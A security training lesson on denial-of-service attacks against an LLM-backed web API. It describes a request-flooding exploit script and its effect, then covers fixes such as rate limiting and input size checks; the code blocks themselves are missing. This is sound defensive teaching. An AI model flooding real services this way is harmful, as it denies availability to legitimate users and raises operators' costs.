Denial of service
Bringing down and LLM with DoS
AI/ML
What is a denial of service attack?
A denial of service (DoS) attack is a security vulnerability that could allow an attacker to make a network service or digital system unavailable by overloading it with bogus internet traffic, thus denying service to legitimate users. It impacts the availability factor of the application system.
Imagine an attacker orchestrating this attack by flooding ChatGPT's servers with overwhelming fake internet traffic. This is not an attempt to steal data but rather an effort to sap the system's resources, leading to operational disruptions and making ChatGPT unavailable for genuine users. To draw a parallel, it's as if someone is blocking the entrance to a store, preventing customers from coming in. While the store's goods remain untouched, its functionality is severely compromised. In the case of a web based AI tool, a single attacker's system might not be sufficient for a successful DoS attack. Thus, the attacker might coordinate multiple systems to simultaneously target this AI tool, creating a distributed denial of service (DDoS) attack.
About this lesson
This lesson will teach us how denial of service (DoS) attacks work, why they occur, and how to prevent them. We will start by performing a DoS attack on an application that could impact the availability of the end users' resources. We’ll then dive deep into the vulnerable code that allowed us to perform the attack and finish by fixing up the code.
First, let's look at the piece of code that was vulnerable:
Now, let's take a look at the code for the exploit. The code above in the "in action" section was only a snippet.
This script will send a POST
request to the server every 100 milliseconds (as specified by REQUEST_INTERVAL_MS
) for a total duration of 10 seconds (as specified by ATTACK_DURATION_MS
). Each request contains a simple string payload, but in a real exploit, this could be tailored to maximize the impact on the server.
After sending the request, we observed that the exploit affected the application’s availability for another user, which could lead to a massive bottleneck in the application's use case.
What is the impact of resource exhaustion through Denial of Service?
Denial of service (DoS) attacks can have significant and multifaceted impacts on an organization and its services. In the example above, it is only a beta application running locally, but if this were in production, it would cause significant outages for all users.
As we can see, a successful DoS attack can render the service completely inaccessible to legitimate users, leading to downtime. If the LLM is a critical part of business operations, the attack can halt or significantly slow down those operations, leading to lost revenue. For instance, if the LLM is used for customer service, content generation, or decision-making, the disruption can have immediate financial implications.
LLMs often run on cloud platforms that charge based on resource usage. A DoS attack can exponentially increase the computational resources consumed (like CPU, memory, network bandwidth), leading to a spike in cloud hosting costs. Even if the service doesn't go completely offline, its performance can be severely degraded. This results in slow response times and potentially partial unavailability, frustrating users and harming the user experience.
If the LLM is accessed via an API, like in our example, a DoS attack might lead to hitting rate limits, resulting in legitimate requests being blocked or slowed down. Managing and scaling the API to handle such spikes in traffic can incur additional costs.
While a DoS attack typically aims at disrupting service rather than stealing data, the chaos it creates can sometimes be used as a smokescreen for more malicious activities, like data breaches or the installation of malware.
When writing code, we need to ensure it can handle resources safely and mitigate the risk of denial of service (DoS) attacks. A crucial step is implementing strict validation and sanitization of user inputs. This ensures that inputs adhere to expected formats and sizes, filtering out excessively large or malformed inputs that could strain the LLM. Limiting the number of tasks queued for the LLM and the total number of actions processed in response to LLM outputs is also important. Doing so prevents the system from becoming overwhelmed with pending tasks.
There should also be continuous monitoring of the LLM's resource usage for unusual patterns or spikes. Employing anomaly detection systems can automate this monitoring process.
Having fallback mechanisms or redundancy plans in place is also crucial. In the event of an attack, these mechanisms ensure continued service availability, even if with reduced capabilities. Lastly, utilizing cloud-based auto-scaling features that adjust computational resources based on current demand can help handle sudden spikes in usage without requiring manual intervention.
The vulnerability in the code example above can be mitigated in the following way:
The code above has some changes to make it more secure:
Rate limiting: The express-rate-limit middleware limits the number of requests a single IP can make. This prevents an attacker from sending too many requests in a short period.
Input validation and size limitation: The code now checks if the input data exists, is a string, and does not exceed a specified size (5000 characters in this example). This prevents the server from processing excessively large or invalid inputs.
Asynchronous processing: The processDataAsync
function now handles data processing asynchronously, preventing the blocking of the Node.js event loop. This ensures that the server remains responsive even under heavy load.
Test your knowledge!
Keep learning
Learn more about denial of service and other LLM vulnerabilities.
- OWASP slides about their new LLM top 10 list
- A dedicated OWASP page to LLM04, LLM04: Model Denial of Service
- A Snyk publication on the OWASP LLM top 10 list